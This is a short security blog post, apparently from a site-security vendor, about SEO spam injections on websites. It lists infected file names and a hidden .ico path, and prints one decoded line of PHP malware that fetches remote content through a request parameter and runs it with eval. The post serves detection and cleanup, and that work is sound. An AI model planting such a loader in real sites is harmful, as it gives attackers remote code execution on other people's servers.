How to fix SEO spam injections

Recently we noticed several SEO spam injections on the same pattern, starting with a list of encoded malicious files.
If you notice any of these inside your root folder, it means your site is infected: auto_seo.php, accesson.php, wikindex.php, old-index.php, 3index.php. Moreover, any addon sites, hosted on the same account, will be affected by cross-site contamination.

To perform a cleanup, you may follow the steps described here:

Try our Free site check.

After having a closer look, I managed to decode the following strings.

wikindex.php, 3index.php
$ch = curl_init(‘’.$_GET[‘f’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval(‘?>’.$result);


index.php files are being injected with malware, also hidden .ico files are randomly installed.
Example: /wp-includes/blocks/column/.81a49ecc.ico

Malicious domains:,,
Malicious IPs:, ( WholeSale Internet, Inc. ).